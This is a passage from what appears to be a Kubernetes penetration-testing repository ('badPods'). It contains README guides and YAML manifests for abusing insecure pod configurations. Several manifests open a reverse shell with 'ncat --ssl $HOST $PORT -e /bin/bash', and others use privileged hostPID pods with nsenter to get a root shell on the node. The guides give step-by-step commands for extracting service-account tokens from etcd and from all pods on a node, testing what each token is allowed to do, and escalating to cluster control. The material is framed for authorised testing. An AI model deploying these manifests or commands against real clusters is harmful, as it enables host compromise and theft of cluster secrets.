"/bin/sh", "-c", "--" ] 217 | args: [ "while true; do sleep 30; done;" ] 218 | ``` 219 | 220 | **Login in as the instance** 221 | ``` 222 | bash-5.0# az login -i 223 | ``` 224 | 225 | **Some recon ideas** 226 | ``` 227 | az storage account list 228 | az aks list 229 | az identity list 230 | az role assignment list 231 | ``` 232 | 233 | ## Overly permissive service account 234 | If the namespace’s default service account is mounted to `/var/run/secrets/kubernetes.io/serviceaccount/token` in your pod and is overly permissive, use that token to further escalate your privileges within the cluster. 235 | 236 | 237 | **Install kubectl in your pod** 238 | ``` 239 | if [ ! -f "/usr/local/bin/kubectl" ]; then 240 | apt update && apt -y install curl 241 | #Download and install kubectl into pod 242 | curl -LO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl" 243 | chmod +x ./kubectl 244 | mv ./kubectl /usr/local/bin/kubectl 245 | fi 246 | ``` 247 | **See what your pod can do** 248 | ``` 249 | kubectl auth can-i --list 250 | ``` 251 | 252 | 253 | ## Anonymous-auth 254 | If either [the apiserver or the kubelets have anonymous-auth set to true](https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/) and there are no network policy controls preventing it, you can interact with them directly without authentication. 255 | 256 | ## Kernel, container engine, or Kubernetes exploits 257 | An unpatched exploit in the underlying kernel, in the container engine, or in Kubernetes can potentially allow a container escape, or access to the Kubernetes cluster without any additional permissions. i.e. [CVE-2020-8558](https://github.com/tabbysable/POC-2020-8558) 258 | 259 | ## Hunt for vulnerable services 260 | Your pod will likely see a different view of the network services running in the cluster than you can see from the machine you used to create the pod. You can hunt for vulnerable services and applications by proxying your traffic through the pod. 261 | 262 | 263 | 264 | 265 | 266 | # Reference(s): 267 | 268 | * https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ 269 | * https://securekubernetes.com/ 270 | * https://madhuakula.com/kubernetes-goat/ 271 | * https://keramas.github.io/2020/08/10/Recon-Village-CTF-at-DC28.html 272 | * https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/ 273 | * https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/ 274 | * https://github.com/tabbysable/POC-2020-8558 275 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/cronjob/nothing-allowed-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: nothing-allowed-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: nothing-allowed-exec-cronjob 16 | image: ubuntu 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "while true; do sleep 30; done;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | restartPolicy: OnFailure 21 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/cronjob/nothing-allowed-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: nothing-allowed-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: nothing-allowed-revshell-cronjob 16 | image: raesene/ncat 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | restartPolicy: OnFailure 21 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deamonset/nothing-allowed-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: nothing-allowed-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-exec-daemonset 21 | image: ubuntu 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deamonset/nothing-allowed-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: nothing-allowed-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-revshell-daemonset 21 | image: raesene/ncat 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deployment/nothing-allowed-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: nothing-allowed-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: nothing-allowed-exec-deployment 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/deployment/nothing-allowed-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: nothing-allowed-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: nothing-allowed-revshell-deployment 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/job/nothing-allowed-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: nothing-allowed-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: nothing-allowed-exec-job 13 | image: ubuntu 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "while true; do sleep 30; done;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 17 | restartPolicy: OnFailure 18 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/job/nothing-allowed-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: nothing-allowed-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: nothing-allowed-revshell-job 13 | image: raesene/ncat 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 17 | restartPolicy: OnFailure 18 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: nothing-allowed-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: nothing-allowed-pod 10 | image: ubuntu 11 | command: [ "/bin/sh", "-c", "--" ] 12 | args: [ "while true; do sleep 30; done;" ] 13 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/nothing-allowed/pod/nothing-allowed-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: nothing-allowed-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: nothing-allowed-pod 10 | image: raesene/ncat 11 | command: [ "/bin/sh", "-c", "--" ] 12 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 13 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/nothing-allowed/replicaset/nothing-allowed-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: nothing-allowed-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-exec-replicaset 21 | image: ubuntu 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/replicaset/nothing-allowed-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: nothing-allowed-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: nothing-allowed-revshell-replicaset 21 | image: raesene/ncat 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/replicationcontroller/nothing-allowed-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: nothing-allowed-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: nothing-allowed-exec-replicationcontroller 21 | image: ubuntu 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/replicationcontroller/nothing-allowed-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: nothing-allowed-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: nothing-allowed-revshell-replicationcontroller 21 | image: raesene/ncat 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/statefulset/nothing-allowed-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: nothing-allowed-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: nothing-allowed-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: nothing-allowed-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: nothing-allowed-exec-statefulset 37 | image: ubuntu 38 | command: [ "/bin/sh", "-c", "--" ] 39 | args: [ "while true; do sleep 30; done;" ] 40 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 41 | -------------------------------------------------------------------------------- /manifests/nothing-allowed/statefulset/nothing-allowed-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: nothing-allowed-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: nothing-allowed-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: nothing-allowed-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: nothing-allowed-revshell-statefulset 37 | image: raesene/ncat 38 | command: [ "/bin/sh", "-c", "--" ] 39 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 40 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 41 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #2: Privileged and hostPID 2 | ![](../../.github/images/Pod2.jpg) 3 | 4 | In this scenario, the only thing that changes from the everything-allowed pod is how you gain root access to the host. Rather than chrooting to the host’s filesystem, you can use `nsenter` to get a root shell on the node running your pod. 5 | 6 | Why does it work? 7 | 8 | * **Privileged** - The `privileged: true` container-level security context breaks down almost all the walls that containers are supposed to provide. The PID namespace is one of the few walls that stands, however. Without `hostPID`, `nsenter` would only work to enter the namespaces of a process running within the container. For more examples on what you can do if you only have privileged: true, refer to the next example Bad Pod #3: Privileged Only. 9 | * **Privileged + hostPID** - When both `hostPID: true` and `privileged: true` are set, the pod can see all of the processes on the host, and you can enter the init system (PID 1) on the host, and execute your shell on the node. 10 | 11 | Once you are root on the host, the privilege escalation paths are all the same as described in Bad Pod # 1: Everything-allowed 12 | 13 | ## Table of Contents 14 | - [Pod creation & access](#pod-creation--access) 15 | - [Exec pods](#exec-pods) 16 | - [Reverse shell pods](#reverse-shell-pods) 17 | - [Deleting resources](#deleting-resources) 18 | - [Post exploitation](#post-exploitation) 19 | - [Can you run your pod on a control-plane node](#can-you-run-your-pod-on-a-control-plane-node) 20 | - [Read secrets from etcd](#read-secrets-from-etcd) 21 | - [Look for kubeconfigs in the host filesystem](#look-for-kubeconfigs-in-the-host-filesystem) 22 | - [Grab all tokens from all pods on the system](#grab-all-tokens-from-all-pods-on-the-system) 23 | - [Some other ideas](#some-other-ideas) 24 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 25 | - [Demonstrate impact](#demonstrate-impact) 26 | - [References and further reading:](#references-and-further-reading) 27 | 28 | # Pod creation & access 29 | 30 | ## Exec pods 31 | Create one or more of these resource types and exec into the pod 32 | 33 | **Pod** 34 | ```bash 35 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 36 | kubectl exec -it priv-and-hostpid-exec-pod -- bash 37 | ``` 38 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 39 | 40 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 41 | 42 | ```bash 43 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/[RESOURCE_TYPE]/priv-and-hostpid-exec-[RESOURCE_TYPE].yaml 44 | kubectl get pods | grep priv-and-hostpid-exec-[RESOURCE_TYPE] 45 | kubectl exec -it priv-and-hostpid-exec-[RESOURCE_TYPE]-[ID] -- bash 46 | ``` 47 | 48 | *Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 49 | 50 | To troubleshoot a case where you don't see pods, use `kubectl describe` 51 | 52 | ``` 53 | kubectl describe priv-and-hostpid-exec-[RESOURCE_TYPE] 54 | ``` 55 | 56 | ## Reverse shell pods 57 | Create one or more of these resources and catch the reverse shell 58 | 59 | **Step 1: Set up listener** 60 | ```bash 61 | ncat --ssl -vlp 3116 62 | ``` 63 | 64 | **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst** 65 | 66 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 67 | * Replace the HOST and PORT values to point the reverse shell to your listener 68 | * 69 | ```bash 70 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/priv-and-hostpid/[RESOURCE_TYPE]/priv-and-hostpid-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 71 | ``` 72 | 73 | **Step 3: Catch the shell** 74 | ```bash 75 | $ ncat --ssl -vlp 3116 76 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 77 | Ncat: Listening on :::3116 78 | Ncat: Listening on 0.0.0.0:3116 79 | Connection received on 10.0.0.162 42035 80 | ``` 81 | 82 | ## Deleting resources 83 | You can delete a resource using it's manifest, or by name. Here are some examples: 84 | ``` 85 | kubectl delete [type] [resource-name] 86 | kubectl delete -f manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 87 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml 88 | kubectl delete pod priv-and-hostpid-exec-pod 89 | kubectl delete cronjob priv-and-hostpid-exec-cronjob 90 | ``` 91 | 92 | # Post exploitation 93 | 94 | ## Can you run your pod on a control-plane node 95 | The pod you created above was likely scheduled on a worker node. Before jumping into post exploitation on the worker node, it is worth seeing if you run your a pod on a control-plane node. If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets. This is not a possible on cloud managed Kubernetes clusters like GKE and EKS - they hide the control-plane. 96 | 97 | **Get nodes** 98 | ``` 99 | kubectl get nodes 100 | NAME STATUS ROLES AGE VERSION 101 | k8s-control-plane Ready master 93d v1.19.1 102 | k8s-worker Ready 93d v1.19.1 103 | ``` 104 | 105 | **Pick your manifest, uncomment and update the nodeName field with the name of the control-plane node** 106 | ``` 107 | nodeName: k8s-control-plane 108 | ``` 109 | **Create your pod** 110 | ``` 111 | kubectl apply -f manifests/priv-and-hostpid/job/priv-and-hostpid-exec-job.yaml 112 | ``` 113 | 114 | ### Read secrets from etcd 115 | If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. 116 | 117 | Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion. 118 | 119 | **Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)** 120 | ``` 121 | root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir 122 | ``` 123 | Output: 124 | ``` 125 | data-dir=/var/lib/etcd 126 | ``` 127 | **View the data in etcd database:** 128 | ``` 129 | strings /var/lib/etcd/member/snap/db | less 130 | ``` 131 | 132 | **Extract the tokens from the database and show the service account name** 133 | ``` 134 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done 135 | ``` 136 | 137 | **Same command, but some greps to only return the default token in the kube-system namespace** 138 | ``` 139 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default 140 | ``` 141 | Output: 142 | ``` 143 | 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] 144 | ``` 145 | 146 | 147 | ## Look for kubeconfigs in the host filesystem 148 | 149 | By default, nodes don't have `kubectl` installed. If you are lucky though, an administrator tried to make their life (and yours) a little easier by installing `kubectl` and their highly privileged credentials on the node. We're not so lucky on this GKE node 150 | 151 | **Some ideas:** 152 | ```bash 153 | find / -name kubeconfig 154 | find / -name .kube 155 | grep -R "current-context" /home/ 156 | grep -R "current-context" /root/ 157 | ``` 158 | 159 | ## Grab all tokens from all pods on the system 160 | You can access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod that has a mounted *token* that is bound to a *service account* that is bound to a *clusterrolebinding*, that gives you access to do things like create pods or view secrets in all namespaces. 161 | 162 | Look for tokens that have permissions to get secrets in kube-system. The examples below automate this process for you a bit: 163 | 164 | **Simply list the namespace and location of every token** 165 | ```bash 166 | kubectl exec -it priv-and-hostpid-exec-pod -- bash 167 | tokens=`find /var/lib/kubelet/pods/ -name token -type l`; \ 168 | for token in $tokens; \ 169 | do parent_dir="$(dirname "$token")"; \ 170 | namespace=`cat $parent_dir/namespace`; \ 171 | echo $namespace "|" $token ; \ 172 | done | sort 173 | ``` 174 | 175 | **What does `can-they.sh` do?** 176 | 177 | * Takes the pod name and namespace as input 178 | * Grabs all of the tokens from `/var/lib/kubelet/pods/*` on the host 179 | * Loops each token against the `selfsubjectaccessreviews` endpoint: `kubectl --token=$token auth can-i [$user-input]` 180 | 181 | 182 | **Run `can-they.sh` where you have kubectl installed and NOT from within the priv pod** 183 | ``` 184 | ./can-they.sh 185 | ./can-they.sh -i "--list -n kube-system" 186 | ./can-they.sh -i "--list -n default" 187 | ./can-they.sh -i "list secrets -n kube-system" 188 | ./can-they.sh -i "create pods -n kube-system" 189 | ./can-they.sh -i "create clusterrolebindings" 190 | ``` 191 | 192 | **Example Run on kubeadm cluster showing that the kubevol-token can list secrets in kube-system** 193 | ``` 194 | ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "get secrets -n kube-system" 195 | -------------------------------------------------------- 196 | Token Location: /var/lib/kubelet/pods/21b0eb3f-b99e-40ed-bedf-198c77dfc101/volumes/kubernetes.io~secret/kubevol-token-xfjgv/token 197 | Can I get secrets -n kube-system? 198 | yes 199 | 200 | -------------------------------------------------------- 201 | Token Location: /var/lib/kubelet/pods/75c4da2c-29ef-41c2-bc66-5994a690abd0/volumes/kubernetes.io~secret/default-token-qqgjc/token 202 | Can I get secrets -n kube-system? 203 | no 204 | ...omitted for brevity... 205 | ``` 206 | 207 | 208 | 209 | 210 | *Run this where you have kubectl installed and NOT from within the priv pod.* 211 | ``` 212 | tokens=`kubectl exec -it priv-and-hostpid-exec-pod -- find /var/lib/kubelet/pods/ -name token -type l`; \ 213 | for filename in $tokens; \ 214 | do filename_clean=`echo $filename | tr -dc '[[:print:]]'`; \ 215 | echo "Token Location: $filename_clean"; \ 216 | tokena=`kubectl exec -it priv-and-hostpid-exec-pod -- cat $filename_clean`; \ 217 | echo -n "What can I do? "; \ 218 | kubectl --token=$tokena auth can-i --list; echo; \ 219 | done 220 | ``` 221 | This is what just happened: 222 | * From outside the pod, you execute `kubectl exec` to find all of the token locations on the host 223 | * You then iterate through the list of filenames, and 224 | * Print the token location 225 | * Run `kubectl auth can-i list` using each token via the `--token` command line argument. 226 | * This gives you a list of the actions each token can perform cluster wide. 227 | 228 | The next command will do the same thing, but just in the kube-system namespace. 229 | 230 | **Run kubectl can-i --list -n kube-system against ALL tokens found on the node** 231 | 232 | *Run this where you have kubectl installed, and NOT from within the priv pod.* 233 | ``` 234 | tokens=`kubectl exec -it priv-and-hostpid-exec-pod -- find /var/lib/kubelet/pods/ -name token -type l`; \ 235 | for filename in $tokens; \ 236 | do filename_clean=`echo $filename | tr -dc '[[:print:]]'`; \ 237 | echo "Token Location: $filename_clean"; \ 238 | tokena=`kubectl exec -it priv-and-hostpid-exec-pod -- cat $filename_clean`; \ 239 | echo -n "What can I do? "; \ 240 | kubectl --token=$tokena auth can-i --list -n kube-system; echo; \ 241 | done 242 | ``` 243 | 244 | **Can any of the tokens:** 245 | * Create a pod, deployment, etc. in the kube-system namespace? 246 | * Create a role in the kube-system namespace? 247 | * View secrets in the kube-system namespace? 248 | * Create clusterrolebindings? 249 | 250 | You are looking for a way to access to all resources in all namespaces. 251 | 252 | 253 | ## Some other ideas 254 | * Add your public key authorized_keys on the node and ssh to it 255 | * Crack passwords in /etc/shadow, see if you can use them to access control-plane nodes 256 | * Look at the volumes that each of the pods have mounted. You might find some pretty sensitive stuff in there. 257 | 258 | ## Attacks that apply to all pods, even without any special permissions 259 | 260 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 261 | 262 | * Access the cloud metadata service 263 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 264 | * Kubernetes exploits 265 | * Hunting for vulnerable application/services in the cluster 266 | 267 | 268 | # Demonstrate impact 269 | 270 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 271 | 272 | 273 | # References and further reading: 274 | * https://twitter.com/mauilion/status/1129468485480751104 275 | * https://github.com/kvaps/kubectl-node-shell 276 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) 277 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 278 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 279 | * The Path Less Traveled: Abusing Kubernetes Defaults - [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 280 | 281 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/cronjob/priv-and-hostpid-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-and-hostpid-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: priv-and-hostpid-exec-cronjob 17 | image: ubuntu 18 | tty: true 19 | securityContext: 20 | privileged: true 21 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 22 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 23 | restartPolicy: OnFailure 24 | 25 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/cronjob/priv-and-hostpid-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-and-hostpid-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostPID: true 15 | containers: 16 | - name: priv-and-hostpid-revshell-cronjob 17 | image: raesene/ncat 18 | securityContext: 19 | privileged: true 20 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | restartPolicy: OnFailure 23 | 24 | -------------------------------------------------------------------------------- 